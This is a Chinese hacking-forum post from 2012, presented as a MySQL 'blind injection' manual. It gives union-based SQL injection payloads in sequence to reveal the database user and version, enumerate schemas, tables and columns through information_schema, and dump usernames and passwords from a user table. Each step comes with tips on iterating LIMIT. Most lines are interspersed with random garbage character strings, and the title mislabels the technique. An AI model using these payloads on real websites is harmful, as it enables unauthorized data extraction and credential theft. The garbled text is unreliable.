中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]
作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册
7 u, @$ h* R& ~- _
教程内容:Mysql 5+php 注入, e% y' a7 [1 z1 U! {# e: i; w" ?

2 f" m$ G; Q6 F' `  s  d0 H) N6 `. n$ F1 Y0 i4 N3 g
. E4 \/ S9 o5 W, X% c9 Z; q( Y5 D' [
一.查看MYSQL基本信息(库名,版本,用户)
) q: t% R, }- H
9 k7 q& ]3 ~- G( a! w5 k+ s' qand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*" \. H* w; _8 s( x" w

* w4 [+ H# R. V, k9 {) {7 w二.查数据库
5 i0 c- j9 B* \
! [1 A0 ]/ o: T. x, z/ land 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*- W" ^7 i/ l2 J  O% d* r
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。" I; q& {3 c  U6 A
* W: f" B* E% s- Z; r; D5 f  I
三.暴表/ [9 W) e3 K3 d3 B

, u" b- j4 D" q7 ?and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
1 W9 P7 D" `: G9 J8 W+ q3 _) U' p, X& p2 r" ?" s. ^
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。: n' I9 u5 X" A' Z( v

& L) H1 U1 |$ m& X$ {3 T. q; [, F四.暴字段- m: ?  s  E1 |3 ~9 t
7 m: R/ h3 L, v# D/ w# W
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
* _0 ], ^7 Y7 L9 E3 q5 |% c5 ~8 i. S; S
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。9 |* e' l* z8 b( F! S/ f  k- T
2 }" P' U8 h/ y4 F
五.暴数据3 G, A0 H& S# l# @+ u
5 ^. P- ^& w( J
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
" k# b/ _4 a5 g' v, H9 R
4 o8 t) y. A  `+ s/ n1 m* k1 c& t3 i7 V0 x6 X- H
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
3 I* A4 e" f" {! g9 ?0 ], A9 u& e



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2